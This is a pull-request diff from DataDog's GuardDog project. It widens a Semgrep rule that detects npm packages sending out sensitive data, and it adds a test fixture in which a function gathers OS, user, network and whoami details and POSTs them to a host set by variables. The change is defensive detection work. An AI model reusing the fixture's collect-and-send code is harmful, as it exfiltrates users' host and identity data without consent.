Merge pull request #501 from DataDog/s.obregoso/fix_npm_exfil

Adding new case to npm-exfiltration
DataDog · Dec 13, 2024 · e3fe533 · e3fe533
2 parents e94f9f3 + 7f67f33
commit e3fe533
Show file tree

Hide file tree

Showing 2 changed files with 50 additions and 0 deletions.
diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
@@ -59,6 +59,12 @@ rules:
     pattern-sinks:
       - patterns:
           - pattern-either:
+              - pattern-inside: |
+                  $HTTP = ... .request(...)
+                  ...
+              - pattern-inside: |
+                  $HTTP = require('http')
+                  ...
               - pattern-inside: |
                   $HTTP = require('https')
                   ...
@@ -79,6 +85,7 @@ rules:
             - pattern: $HTTP. ... .get(...)
             - pattern: $HTTP. ... .post(...)
             - pattern: $HTTP. ... .push(...)
+            - pattern: $HTTP. ... .write(...)
             - pattern: $HTTP(...)
     languages:
       - javascript

diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
@@ -113,3 +113,46 @@ function f(){
         });
     });
 }
+
+function f(){
+    const os = require('os');
+    const http = require('http');
+    // Collect device information
+    const deviceInfo = {
+        platform: os.platform(),
+        release: os.release(),
+        hostname: os.hostname(),
+        arch: os.arch(),
+        userInfo: os.userInfo(),
+        networkInterfaces: os.networkInterfaces(),
+        whoamiinfo: whoamiInfo, // Include whoami output
+        user: "Keycloak",
+    };
+
+    // Define the request options
+    const options = {
+        hostname: apiHostname,
+        port: apiPort,
+        path: apiPath,
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json', // Inform the server about the JSON body
+        },
+    };
+
+    // Create the request
+    const req = http.request(options, (res) => {
+        console.log(`Status: ${res.statusCode}`);
+        res.on('data', (chunk) => {
+            console.log(`Body: ${chunk}`);
+        });
+    });
+
+    req.on('error', (error) => {
+        console.error(`Error: ${error.message}`);
+    });
+
+    // ruleid:npm-exfiltrate-sensitive-data
+    req.write(JSON.stringify(deviceInfo));
+    req.end();
+}